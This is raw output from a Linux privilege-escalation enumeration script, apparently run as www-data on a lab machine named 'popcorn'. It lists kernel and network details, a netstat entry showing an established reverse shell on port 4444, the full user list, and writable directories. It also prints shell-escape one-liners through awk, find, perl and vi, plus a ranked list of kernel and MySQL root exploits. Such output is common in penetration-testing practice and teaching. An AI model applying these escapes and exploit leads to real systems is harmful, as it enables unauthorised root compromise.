=================================================================================================
LINUX PRIVILEGE ESCALATION CHECKER
=================================================================================================

[*] GETTING BASIC SYSTEM INFO...

[+] Kernel
    Linux version 2.6.31-14-generic-pae (buildd@rothera) (gcc version 4.4.1 (Ubuntu 4.4.1-4ubuntu8) ) #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009

[+] Hostname
    popcorn

[+] Operating System
    Ubuntu 9.10 \n \l

[*] GETTING NETWORKING INFO...

[+] Interfaces
    eth0      Link encap:Ethernet  HWaddr 00:50:56:bd:43:dd
    inet addr:10.10.10.6  Bcast:10.10.10.255  Mask:255.255.255.0
    inet6 addr: dead:beef::250:56ff:febd:43dd/64 Scope:Global
    inet6 addr: fe80::250:56ff:febd:43dd/64 Scope:Link
    UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
    RX packets:583 errors:0 dropped:0 overruns:0 frame:0
    TX packets:461 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:183326 (183.3 KB)  TX bytes:157606 (157.6 KB)
    lo        Link encap:Local Loopback
    inet addr:127.0.0.1  Mask:255.0.0.0
    inet6 addr: ::1/128 Scope:Host
    UP LOOPBACK RUNNING  MTU:16436  Metric:1
    RX packets:24 errors:0 dropped:0 overruns:0 frame:0
    TX packets:24 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:0
    RX bytes:2454 (2.4 KB)  TX bytes:2454 (2.4 KB)

[+] Netstat
    Active Internet connections (servers and established)
    Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
    tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
    tcp        0    543 10.10.10.6:60563        10.10.14.25:4444        ESTABLISHED 1395/sh
    tcp6       0      0 :::80                   :::*                    LISTEN      -
    tcp6       0      0 :::22                   :::*                    LISTEN      -
    tcp6       0      0 10.10.10.6:80           10.10.14.25:40228       ESTABLISHED -

[+] Route

[*] GETTING FILESYSTEM INFO...

[+] Mount results
    /dev/mapper/popcorn-root on / type ext4 (rw,errors=remount-ro)
    proc on /proc type proc (rw)
    none on /sys type sysfs (rw,noexec,nosuid,nodev)
    none on /sys/fs/fuse/connections type fusectl (rw)
    none on /sys/kernel/debug type debugfs (rw)
    none on /sys/kernel/security type securityfs (rw)
    udev on /dev type tmpfs (rw,mode=0755)
    none on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620)
    none on /dev/shm type tmpfs (rw,nosuid,nodev)
    none on /var/run type tmpfs (rw,nosuid,mode=0755)
    none on /var/lock type tmpfs (rw,noexec,nosuid,nodev)
    none on /lib/init/rw type tmpfs (rw,nosuid,mode=0755)
    /dev/sda5 on /boot type ext2 (rw)

[+] fstab entries
    # /etc/fstab: static file system information.
    #
    # Use 'blkid -o value -s UUID' to print the universally unique identifier
    # for a device; this may be used with UUID= as a more robust way to name
    # devices that works even if disks are added and removed. See fstab(5).
    #
    # <file system> <mount point>   <type>  <options>       <dump>  <pass>
    proc            /proc           proc    defaults        0       0
    /dev/mapper/popcorn-root /               ext4    errors=remount-ro 0       1
    # /boot was on /dev/sda5 during installation
    UUID=840b41db-1f13-4aa6-9f4b-38dfaf65c65c /boot           ext2    defaults        0       2
    /dev/mapper/popcorn-swap_1 none            swap    sw              0       0
    /dev/scd0       /media/cdrom0   udf,iso9660 user,noauto,exec,utf8 0       0
    /dev/fd0        /media/floppy0  auto    rw,user,noauto,exec,utf8 0       0

[+] Scheduled cron jobs
    -rw-r--r-- 1 root root  724 Sep 15  2009 /etc/crontab
    /etc/cron.d:
    total 16
    drwxr-xr-x  2 root root 4096 Mar 17  2017 .
    drwxr-xr-x 84 root root 4096 Oct 31 19:42 ..
    -rw-r--r--  1 root root  102 Sep 15  2009 .placeholder
    -rw-r--r--  1 root root  506 May  3  2011 php5
    /etc/cron.daily:
    total 68
    drwxr-xr-x  2 root root  4096 Mar 17  2017 .
    drwxr-xr-x 84 root root  4096 Oct 31 19:42 ..
    -rw-r--r--  1 root root   102 Sep 15  2009 .placeholder
    -rwxr-xr-x  1 root root   633 Nov 18  2010 apache2
    -rwxr-xr-x  1 root root   189 Oct 23  2009 apport
    -rwxr-xr-x  1 root root 16338 Oct 15  2009 apt
    -rwxr-xr-x  1 root root   314 Sep 28  2009 aptitude
    -rwxr-xr-x  1 root root   502 May  9  2009 bsdmainutils
    -rwxr-xr-x  1 root root   256 Sep 20  2009 dpkg
    -rwxr-xr-x  1 root root    89 Aug 20  2009 logrotate
    -rwxr-xr-x  1 root root  1270 Sep  7  2009 man-db
    -rwxr-xr-x  1 root root   665 Apr 29  2009 mlocate
    -rwxr-xr-x  1 root root  2149 Jun 16  2009 popularity-contest
    -rwxr-xr-x  1 root root  3349 Sep 15  2009 standard
    /etc/cron.hourly:
    total 12
    drwxr-xr-x  2 root root 4096 Mar 17  2017 .
    drwxr-xr-x 84 root root 4096 Oct 31 19:42 ..
    -rw-r--r--  1 root root  102 Sep 15  2009 .placeholder
    /etc/cron.monthly:
    total 16
    drwxr-xr-x  2 root root 4096 Mar 17  2017 .
    drwxr-xr-x 84 root root 4096 Oct 31 19:42 ..
    -rw-r--r--  1 root root  102 Sep 15  2009 .placeholder
    -rwxr-xr-x  1 root root  129 Sep 15  2009 standard
    /etc/cron.weekly:
    total 16
    drwxr-xr-x  2 root root 4096 Mar 17  2017 .
    drwxr-xr-x 84 root root 4096 Oct 31 19:42 ..
    -rw-r--r--  1 root root  102 Sep 15  2009 .placeholder
    -rwxr-xr-x  1 root root  830 Sep  7  2009 man-db

[+] Writable cron dirs


[*] ENUMERATING USER AND ENVIRONMENTAL INFO...

[+] Logged in User Activity
    20:35:42 up 52 min,  0 users,  load average: 0.00, 0.00, 0.00
    USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT

[+] Super Users Found:
    root

[+] Environment
    SHLVL=1
    OLDPWD=/
    APACHE_PID_FILE=/var/run/apache2.pid
    _=/usr/bin/python
    PATH=/usr/local/bin:/usr/bin:/bin
    LANG=C
    APACHE_RUN_GROUP=www-data
    APACHE_RUN_USER=www-data
    PWD=/tmp

[+] Root and current user history (depends on privs)

[+] Sudoers (privileged)

[+] All users
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    bin:x:2:2:bin:/bin:/bin/sh
    sys:x:3:3:sys:/dev:/bin/sh
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/bin/sh
    man:x:6:12:man:/var/cache/man:/bin/sh
    lp:x:7:7:lp:/var/spool/lpd:/bin/sh
    mail:x:8:8:mail:/var/mail:/bin/sh
    news:x:9:9:news:/var/spool/news:/bin/sh
    uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
    proxy:x:13:13:proxy:/bin:/bin/sh
    www-data:x:33:33:www-data:/var/www:/bin/sh
    backup:x:34:34:backup:/var/backups:/bin/sh
    list:x:38:38:Mailing List Manager:/var/list:/bin/sh
    irc:x:39:39:ircd:/var/run/ircd:/bin/sh
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
    nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
    libuuid:x:100:101::/var/lib/libuuid:/bin/sh
    syslog:x:101:103::/home/syslog:/bin/false
    landscape:x:102:105::/var/lib/landscape:/bin/false
    sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
    george:x:1000:1000:George Papagiannopoulos,,,:/home/george:/bin/bash
    mysql:x:104:113:MySQL Server,,,:/var/lib/mysql:/bin/false

[+] Current User
    www-data

[+] Current User ID
    uid=33(www-data) gid=33(www-data) groups=33(www-data)

[*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS...

[+] World Writeable Directories for User/Group 'Root'
    drwxrwxrwt 2 root root 40 Oct 31 19:42 /dev/shm
    drwx-wx-wt 2 root root 4096 Oct 31 20:11 /var/lib/php5
    drwxrwxrwt 4 root root 80 Oct 31 19:43 /var/lock
    drwxrwxrwt 2 root root 4096 Oct 15  2009 /var/crash
    drwxrwxrwt 2 root root 4096 Oct 20  2009 /var/tmp
    drwxrwxrwt 4 root root 4096 Oct 31 20:34 /tmp
    drwxrwxrwt 2 root root 4096 Oct 31 19:42 /tmp/.ICE-unix
    drwxrwxrwt 2 root root 4096 Oct 31 19:42 /tmp/.X11-unix

[+] World Writeable Directories for Users other than Root
    drwxrwxrwx 2 www-data www-data 4096 Mar 17  2017 /var/www/torrent/torrents
    drwxrwxrwx 2 www-data www-data 4096 Oct 31 20:13 /var/www/torrent/upload


[+] Sudo Version (Check out http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=sudo)
    Sudo version 1.7.0


[*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING...

[+] Installed Tools
    /usr/bin/awk
    /usr/bin/perl
    /usr/bin/python
    /usr/bin/gcc
    /usr/bin/cc
    /usr/bin/vi
    /usr/bin/vim
    /usr/bin/find
    /bin/netcat
    /bin/nc
    /usr/bin/wget
    /usr/bin/ftp

[+] Related Shell Escape Sequences...

    vi-->	:!bash
    vi-->	:set shell=/bin/bash:shell
    vi-->	:!bash
    vi-->	:set shell=/bin/bash:shell
    awk-->	awk 'BEGIN {system("/bin/bash")}'
    find-->	find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;
    perl-->	perl -e 'exec "/bin/bash";'

[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...

    Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!

    The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system
    - 2.6 UDEV < 141 Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/8572 || Language=c
    - 2.6 UDEV Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/8478 || Language=c
    - MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c

    The following exploits are applicable to this kernel version and should be investigated as well
    - Kernel ia32syscall Emulation Privilege Escalation || http://www.exploit-db.com/exploits/15023 || Language=c
    - Sendpage Local Privilege Escalation || http://www.exploit-db.com/exploits/19933 || Language=ruby**
    - 2.x sock_sendpage() Local Root Exploit 2 || http://www.exploit-db.com/exploits/9436 || Language=c
    - 2.4/2.6 sock_sendpage() ring0 Root Exploit (simple ver) || http://www.exploit-db.com/exploits/9479 || Language=c
    - 2.6 UDEV < 141 Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/8572 || Language=c
    - 2.x sock_sendpage() Local Ring0 Root Exploit || http://www.exploit-db.com/exploits/9435 || Language=c
    - CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) || http://www.exploit-db.com/exploits/15944 || Language=c
    - Linux RDS Protocol Local Privilege Escalation || http://www.exploit-db.com/exploits/15285 || Language=c
    - 2.6.x ptrace_attach Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/8673 || Language=c
    - 2.4/2.6 bluez Local Root Privilege Escalation Exploit (update) || http://www.exploit-db.com/exploits/926 || Language=c
    - CAP_SYS_ADMIN to root Exploit || http://www.exploit-db.com/exploits/15916 || Language=c
    - 2.6 UDEV Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/8478 || Language=c
    - MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
    - < 2.6.36.2 Econet Privilege Escalation Exploit || http://www.exploit-db.com/exploits/17787 || Language=c
    - 'pipe.c' Local Privilege Escalation Vulnerability || http://www.exploit-db.com/exploits/10018 || Language=sh
    - <= 2.6.37 Local Privilege Escalation || http://www.exploit-db.com/exploits/15704 || Language=c
    - open-time Capability file_ns_capable() Privilege Escalation || http://www.exploit-db.com/exploits/25450 || Language=c
    - 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 Pipe.c Privelege Escalation || http://www.exploit-db.com/exploits/9844 || Language=python
    - open-time Capability file_ns_capable() - Privilege Escalation Vulnerability || http://www.exploit-db.com/exploits/25307 || Language=c
    - 2.4/2.6 sock_sendpage() Local Root Exploit [2] || http://www.exploit-db.com/exploits/9598 || Language=c
    - < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit || http://www.exploit-db.com/exploits/14814 || Language=c
    - 2.4/2.6 sock_sendpage() Local Root Exploit (ppc) || http://www.exploit-db.com/exploits/9545 || Language=c
    - < 2.6.37-rc2 ACPI custom_method Privilege Escalation || http://www.exploit-db.com/exploits/15774 || Language=c
    - 2.4/2.6 sock_sendpage() Local Root Exploit [3] || http://www.exploit-db.com/exploits/9641 || Language=c
    - 2.4.x / 2.6.x uselib() Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/895 || Language=c

